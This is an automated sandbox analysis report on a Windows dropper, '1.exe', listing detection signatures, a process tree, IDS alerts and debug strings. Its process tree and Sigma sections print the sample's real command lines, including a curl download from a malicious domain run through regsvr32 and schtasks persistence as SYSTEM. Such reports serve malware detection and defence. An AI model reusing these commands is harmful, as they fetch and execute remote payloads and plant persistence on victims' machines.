Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.exe

Overview

General Information

Sample name:1.exe
Analysis ID:1624614
MD5:55db74d76184ca9be1284939b37d41b8
SHA1:b5564229bdbe777deeefd3bdf78ea334b0e09695
SHA256:58b324d37bbf6d706b0fe5dbb8bca92d9628a9c394ca81121cea1690a16a3afa
Tags:exeSTERLINGSPIRITSCOMPANYLIMITEDuser-SquiblydooBlog
Infos:

Detection

Score:46
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
.NET source code references suspicious native API functions
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected AdvancedInstaller

Classification

Process Tree

  • System is w10x64
  • 1.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 55DB74D76184CA9BE1284939B37D41B8)
    • 1.exe (PID: 928 cmdline: "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="5480" CHAINERUIPROCESSID="5480Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740568836 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1" MD5: 55DB74D76184CA9BE1284939B37D41B8)
  • msiexec.exe (PID: 3652 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5720 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 1514DFDED1D4D3DC7DCB6F08CA344BC7 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1704 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2A686A53703CFC1ECF33E3BA90C58CFA MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3168 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B87F19D5FD070A95D977AA5C885A4C95 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MainSoftware.exe (PID: 5696 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent MD5: 7E91C0735D8936E8572276340A6F252E)
      • schtasks.exe (PID: 3912 cmdline: "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 3260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3176 cmdline: "schtasks.exe" /run /tn "MyPersistentApp_Hourly" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SoftwareDistributor.exe (PID: 3064 cmdline: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1 MD5: 2662878C97303F23A828146797CC4827)
      • schtasks.exe (PID: 1272 cmdline: "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MainSoftware.exe (PID: 2252 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Loop MD5: 7E91C0735D8936E8572276340A6F252E)
    • Install.exe (PID: 4556 cmdline: "C:\Program Files (x86)\Main\Chop\Install.exe" MD5: 675F1B648B3E8810A4A32FE32546490B)
      • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2720 cmdline: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 1984 cmdline: curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\289930.ocx" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • regsvr32.exe (PID: 4452 cmdline: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • Install.exe (PID: 4432 cmdline: "C:\Program Files\Surfclub\Install.exe" install https://p1-ag5.pages.dev?source_id=1 MD5: FCC543B0749F3A095487A32338743488)
    • Surfclub.exe (PID: 6284 cmdline: "C:\Program Files\Surfclub\Surfclub.exe" install https://p1-ag5.pages.dev?source_id=1 MD5: 451886E7BDB0BE736A5F2E5A9999CCD0)
  • Surfclub.exe (PID: 6932 cmdline: "C:\Program Files\Surfclub\Surfclub.exe" update MD5: 451886E7BDB0BE736A5F2E5A9999CCD0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AdvancedInstallerYara detected AdvancedInstallerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 3064, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f, ProcessId: 1272, ProcessName: schtasks.exe
    Sigma detected: Msiexec Initiated Connection
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.80.136, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3168, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740
    Sigma detected: Network Connection Initiated By Regsvr32.EXE
    Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 34.160.111.145, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 4452, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49913
    Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx", CommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2720, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx", ProcessId: 4452, ProcessName: regsvr32.exe
    Sigma detected: Usage Of Web Request Commands And Cmdlets
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Main\Chop\Install.exe" , ParentImage: C:\Program Files (x86)\Main\Chop\Install.exe, ParentProcessId: 4556, ParentProcessName: Install.exe, ProcessCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ProcessId: 2720, ProcessName: cmd.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-02-26T12:23:58.332774+010028292021A Network Trojan was detected192.168.2.449740104.21.80.136443TCP
    2025-02-26T12:24:15.864604+010028292021A Network Trojan was detected192.168.2.449741104.21.80.136443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://wetransfers.io/v.phpAvira URL Cloud: Label: malware
    Multi AV Scanner detection for dropped file
    Source: C:\Program Files (x86)\Main\Chop\Install.exeReversingLabs: Detection: 31%
    Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: C:\Program Files\Surfclub\Install.exeDirectory created: C:\Program Files\Surfclub\Surfclub.exe
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\uuid
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\domains
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\installation_config.json
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\How to uninstall.txtJump to behavior
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49842 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49844 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49882 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49900 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49920 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49932 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49944 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49952 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49961 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49963 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49991 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:50001 version: TLS 1.2
    Source: 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D710000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459347730.0000024A2D621000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459431055.0000024A2D661000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000009.00000002.2458563735.0000024A2D4C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458435026.0000024A2D42C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499249216.0000021DED311000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D391000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487209932.0000021DEA141000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458406613.0000024A2D411000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D096000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457231097.0000024A2D161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D091000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486011190.0000021DE9EC1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000009.00000002.2457944763.0000024A2D371000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458017065.0000024A2D381000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000009.00000002.2459714008.0000024A2D6D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459648718.0000024A2D6C2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487984945.0000021DEA262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458168635.0000024A2D3CA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458251640.0000024A2D3E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000009.00000002.2459307961.0000024A2D601000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5DD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000009.00000002.2459749816.0000024A2D6ED000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459831114.0000024A2D701000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458563735.0000024A2D4C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458435026.0000024A2D42C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499249216.0000021DED311000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D342000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000009.00000002.2456286438.0000024A2B351000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456196090.0000024A2B349000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459117236.0000024A2D5C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5BC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000009.00000002.2453861770.00000209957FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453952929.0000020995831000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482321883.0000021DE7EC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000009.00000002.2453520509.0000020993E71000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453570792.0000020993EA9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000009.00000002.2457601992.0000024A2D271000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D247000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2456147251.0000024A2B321000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2FB000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483635124.0000021DE812B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483816012.0000021DE8151000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000009.00000002.2452853423.0000020993BF1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D22B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D710000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D091000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486011190.0000021DE9EC1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D391000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487209932.0000021DEA141000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbn source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000009.00000002.2472309573.0000024A3051C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472443393.0000024A30531000.00000020.00000001.00040000.0000000A.sdmp
